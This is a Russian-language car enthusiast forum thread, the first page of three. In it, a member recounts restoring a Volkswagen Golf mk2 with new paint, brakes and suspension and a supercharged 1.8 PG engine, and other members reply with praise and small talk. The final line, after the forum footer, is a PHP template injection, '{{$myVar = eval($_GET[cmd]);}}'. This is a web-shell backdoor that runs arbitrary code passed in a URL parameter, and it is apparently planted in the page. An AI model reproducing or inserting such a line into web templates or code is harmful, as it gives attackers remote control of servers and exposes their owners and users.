+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя
Показано с 1 по 10 из 22

Тема: Golf mk2 Компрессорный Пчёл


  1. #1
    GTI-Racing RedVan is on a distinguished road Аватар для RedVan
    Регистрация
    14.12.2009
    Откуда
    Zelenograd
    Машина
    Golf mk2 PG + SC-14
    Сообщений
    22

    Golf mk2 Компрессорный Пчёл

    История моего Носка началась в 2002 году когда из Немеции моему деду пригнали красного четырехглазого чахлика с шильдиком CL бедной комплектации и скромным моторчиком 1,3 на инжекторе (слава Богу не карбюр! :prayer: ) , года 3-4 он на нем отездил на работу и обратно, потом Гольф тихо уснул в гараже за ненадобностью.

    На фото он уже на дицках,а не на штампах как был, и с широким задним бампером, ибо узкий мне размолотили на 2ой день..
    После буквально первого выезда он начал «сыпаться»- пару дней ездиешь неделю ремонтируешь.. :howl: Хотя я думаю не у меня одного такие проблемы были из владельцев мк2)) В итоге после нескольких меясяцев таких поездок и ремонтов машинка заметно приободрилась (хотя периодически все равно капризничала), а уже через год было поменяно и перебрано своими руками практически все основные системы- тормоза полностью, ходовая, подвеска, коробка, выпуск, электрика и тд и тп.. Единственное куда не залезал- это мотор, ибо все работает нормал. Попутно обзаводился ништяками, изучал Гольф-движение, историю, стили и просто заболел Гольфоманией.. Большинство свободного времени начал проводить с ним, избавляясь от колхоза(дед любил тазовские запчасти.. :spit: ), добавляя и придумывая чтоб еще с ним сделать..


    К началу первой зимы в моих руках Носок чувствовал себя превосходно, как внешне так и внутренне. Но саму зиму он пережил с потерями, ибо скользко, да и зимнего стажа не оч. много- морде доставалось не раз (не сильно конечно, но все же)..

    Фары и решетки менялись как перчатки, несколько раз приходилось восстанавливать крыло, но серьезных повреждений не было!
    Зиму вроде пережили, по весне я решил что надо что-то с ним делать- либо восстанавливать и красить, либо продавать и брать что-нить посвежее.. (Эхх, всегда хотел ВРШ :sluni: ) После долгих раздумий и сжатости с финансами все-таки решил "слегка" освежить его покраской.. Ну и как очень любят говорить на г2клубе- начал разрабатывать проЭкт!
    Поначалу в планах было просто восстановить машинку после не совсем "удачной" зимы, покрасить и привести в божеский вид, но пообщавшись с знакомыми-мастерами понял что так просто не отделаюсь, да и до экзотики времени вроде оставалось достаточно- так что подтянув ремень было решено делать все красиво и надолго: не просто подмазать шпаклевкой вмятины, а все что нужно или намекалось на нужность было проварено и отрихтовано под минимальный слой шпакли.
    Первым делом заехал к магазин за первой партией ништяков- а именно морды практически полностью..
    Так же были приобретены 16-ти дюймовые лапти RH CUP.
    Ну и разобравшись со всеми прочими делами и взяв отгул на пару недель начались работы: за сутки раскидал салон, пластик и морду (благо в этом проблем не было- салон я разбирал не раз, в частности в прошлом году при прокладке шумки :ok: )


    Потом договорился в сервисе взять подъемник в аренду: менять пружины и тормоза в гараже на домкрате что-то не совсем улыбало, там все таки удобнее.. В итоге пружинки на -40 и тормоза были внедрены на новое место жительства (перед 256 вентиля от пассата и задние дисковые).



    Здесь меня подобламали первые подводные камни- вместо запланированного дня, я провисел на подъемнике почти 3- так как с тормозами пришлось повозиться: на заднем суппорте штуцер был обломан, и при разборе передних еще один штуцер пожелал остаться внутри. Слесаря после неудачной попытки выкрутить штуцер с заднего суппорта звездочкой отломили половину каленой звездочки внутри штуцера, в итоге целый день эти обломки извлекались оттуда.. После вроде как "успешной" операции при прокачке выяснилось что с обоих штуцеров травит жидкость, на устранение этой проблемы ушла тоже добрая половина дня..
    Но все же с тормозами вроде как разобрались (хотя один задний суппорт все-таки окозался закисшим) и я спустился на проварку кузова


    В свободное времы восстанавливал пластик- царапины, рытвины и прочее были замазаны шпаклей, загрунтованы и окрашены структурной краской для пластика- вид получился как у новых!
    Далее были проварены несколько очагов корозии, дырки от "лишних" дворников, ниша под номер, ну и в самый последний момент решил ручки дверей тоже сравнять с землей, то есть с кузовом :commandos:

    Ну и наконец взялись за кузов- заделать и вывести все царапины, вмятины и неровности накопленные за 19 лет- оказалось не так просто как я думал, но мы справились, огромное спасибо ребятам-кузовщикам с которыми мы готовили кузов к покраске!

    После восстановления кузова прогрунтовали и замыли все детали

    Ну теперь можно и в камеру! Надежда успеть на АЭ 2010 все еще есть.. :prayer:
    Время и сроки поджимали, и я насел на ребят основательно: в пятницу и субботу мы уходили из камеры в 6-7 часов утра, несколько часов спали и дальше в бой.. Я верил до последнего что уложусь, и хотя бы в воскресенье заеду на несколько часов, поэтому работа кипела (да и в понедельник уже надо было на работу выходить.. )

    Уложив первый слой лака на черную (!) базу маляр вышел из камеры смеясь, я не поняв в чем дела заглянул во внутрь и обомлел- вместо черного я увидел практически хамелеон- в зависимости от угла зрения перелив от темно зеленого, золотого и в черный.. Это было нечто) причиной оказалось добавление перламутрового ксералика в лак, причем мы по ходу чуток переборщили и он накрыл базу полностью.. :epti-work:

    Из-за того что покраска шла в два цвета, пришлось красить в частями и в несколько этапов с проклейкой всех границ и элементов, что заняло весьма много времени.. По тихоньку начала складываться картинка конечного результата

    Но чем яснее становился внешний вид машины, тем яснее я понимал что не успею никуда.. :howl: В итоге в воскресенье вечером осознав что уже поздно куда-то ехать я плюнув ушел отсыпаться за все три дня, ибо силы были уже на исходе..
    Под конец сборки (в понедельник к обеду) мне становилось все теплее на душе когда мой носок начал преображаться под последними штрихами сборки)) Мои самые смелые ожидания были оправданы с лихвой:






    Фотки 10ого года, новые скоро будут) сейчас выглядит чуть по другому..

    Зимой 2010ого чахломотору совсем поплохело и я решил что пора собрать ему достойную замену, для этого начался сбор запчастей)) за сутки вытащил все из под капота, в том числе и выхлоп.. Несколько недель поисков и покупок собрали в гараже целую гору запчастей которые предстояло внедрить!
    В итоге на выходе под капотом обосновался двиг 1,8 8 клапанный с кодовым названием PG (кто знает тот поймет :pepper:) и японокомпрессор SC-14 с уменьшанным шкивом под 1,2 бара наддува :epti-work:


    До стенда еще не добрался, ибо долго проводилась настройка и подбор нужных датчиков, но скоро думаю узнаю точно сколько коней там завелось)) Но по ощущениям пятой точки- около 200 должно быть)

    Немного о доработках на данный момент

    Внешний вид:
    2-х цветный раскрас Dupon
    Clean look заварены нишы под номер, ручки, антенна и тд..
    Монодворник
    Хрустальная оптика (перед-зад)
    Широкие бампера+гти губа
    Решетка Rally Look
    Ресница Badboy
    Хрусталь ПТФ (ждут инсталляции)

    Двигатель и ходовая:

    Двиг 1,8 PG 8V + SC-14 японокомпрессор 1,2 бара избытка
    Интеркуллер Атомик
    Форсунки ТурбоСааб
    Чип-тюнинг
    Выхлоп 63мм MG-Race
    КПП от Пассата Б3
    ГУР г3

    Подвеска и тормоза:
    Бильштайн газ по кругу
    Пружины FK -40мм
    Полиуретан в сайлентах
    Передние вентилируемые тормоза от Пассата 256 мм
    Задние дисковые от г4
    Стабилизаторы
    Последний раз редактировалось RedVan; 08.06.2011 в 09:27. Причина: Добавлено сообщение

  2. #2
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Ну вот в конце уже виден хороший результат.

    Я тоже бы хотел себе под капот PG :howl::howl::howl:
    песок сыпется....не останавливайтесь на достигнутом !

  3. #3
    Авто Года 2010 Чуйкин has a spectacular aura about Чуйкин has a spectacular aura about Чуйкин has a spectacular aura about Аватар для Чуйкин
    Регистрация
    12.04.2006
    Откуда
    Москвабад
    Машина
    Golf 1.8t 460лс 520Нм
    Сообщений
    2,543
    не ты стоишь на Новосущевской улице днем? там институт по моему какой то

  4. #4
    GTI-Racing RedVan is on a distinguished road Аватар для RedVan
    Регистрация
    14.12.2009
    Откуда
    Zelenograd
    Машина
    Golf mk2 PG + SC-14
    Сообщений
    22
    Цитата Сообщение от Чуйкин Посмотреть сообщение
    не ты стоишь на Новосущевской улице днем? там институт по моему какой то
    Агась, я там работаю и учусь, это МИИТ называется))) Диплом неделю назад как раз защитил)) :tippler:

  5. #5
    Авто Года 2010 Чуйкин has a spectacular aura about Чуйкин has a spectacular aura about Чуйкин has a spectacular aura about Аватар для Чуйкин
    Регистрация
    12.04.2006
    Откуда
    Москвабад
    Машина
    Golf 1.8t 460лс 520Нм
    Сообщений
    2,543
    Цитата Сообщение от RedVan Посмотреть сообщение
    Агась, я там работаю и учусь, это МИИТ называется))) Диплом неделю назад как раз защитил)) :tippler:
    я живу там не далеко.. часто езжу мимо твоей машины)

  6. #6
    GTI-Racing lingus is on a distinguished road Аватар для lingus
    Регистрация
    06.02.2007
    Откуда
    Чехов
    Машина
    Skoda Superb 1.8T
    Сообщений
    1,214
    красивая машина, классно, что есть люди восстанавливающие машины, а не выбрасывающие их на свалку через 20 лет! отличный проект!
    Skoda Superb 1.8T
    NewBeetle 2.0MT Black - продан
    VW golf VI GTi - на попечении

  7. #7
    GTI-Racing RedVan is on a distinguished road Аватар для RedVan
    Регистрация
    14.12.2009
    Откуда
    Zelenograd
    Машина
    Golf mk2 PG + SC-14
    Сообщений
    22
    Цитата Сообщение от Чуйкин Посмотреть сообщение
    я живу там не далеко.. часто езжу мимо твоей машины)
    Ну вот, а я тебя спалил только один раз- в марте ехал навстречу по Волоколамке)) бибикал-бибикал но думаю остался незамеченным..

    Цитата Сообщение от lingus Посмотреть сообщение
    красивая машина, классно, что есть люди восстанавливающие машины, а не выбрасывающие их на свалку через 20 лет! отличный проект!
    да это уже диагноз по ходу)) :spit: спасиб)

  8. #8
    GTI-Racing lingus is on a distinguished road Аватар для lingus
    Регистрация
    06.02.2007
    Откуда
    Чехов
    Машина
    Skoda Superb 1.8T
    Сообщений
    1,214
    да тут половина народа спит и думает: "где взять денег и найти живого г1-г2 и замутить проект выходного дня" :laugh:
    Skoda Superb 1.8T
    NewBeetle 2.0MT Black - продан
    VW golf VI GTi - на попечении

  9. #9
    GTI-Racing RedVan is on a distinguished road Аватар для RedVan
    Регистрация
    14.12.2009
    Откуда
    Zelenograd
    Машина
    Golf mk2 PG + SC-14
    Сообщений
    22
    Цитата Сообщение от lingus Посмотреть сообщение
    да тут половина народа спит и думает: "где взять денег и найти живого г1-г2 и замутить проект выходного дня" :laugh:
    У меня чуток другая ситуация)) Где б взять денег на г5 жоповоз а этот оставить для выходного дня! :woodpecker:

  10. #10
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Цитата Сообщение от lingus Посмотреть сообщение
    да тут половина народа спит и думает: "где взять денег и найти живого г1-г2 и замутить проект выходного дня" :laugh:
    я не думаю
    песок сыпется....не останавливайтесь на достигнутом !

+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя

Метки этой темы

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}